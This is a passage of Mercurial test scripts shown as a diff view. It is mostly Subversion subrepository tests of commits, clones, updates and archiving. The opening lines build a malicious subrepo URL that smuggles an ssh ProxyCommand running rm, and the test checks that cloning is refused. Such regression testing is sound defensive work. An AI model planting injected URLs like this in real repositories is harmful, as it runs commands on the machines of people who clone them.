1208 $ echo 's = [git]ssh://%2DoProxyCommand=rm${IFS}non-existent/path' > .hgsub
1209 $ hg ci -m 'change url to percent encoded'
1210 $ cd ..
1211 $ rm -r malicious-proxycommand-clone
1212 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1213 updating to branch default
1214 abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepository "s")
1215 [255]
@@ -1,641 +1,681 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepository "s")
116 abort: cannot commit missing svn entries (in subrepository "s")
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo to without
120 add an unrelated revision in svn and update the subrepo to without
121 bringing any changes.
121 bringing any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepository "s")
173 abort: cannot commit svn externals (in subrepository "s")
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepository "s")
195 abort: cannot commit svn externals (in subrepository "s")
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
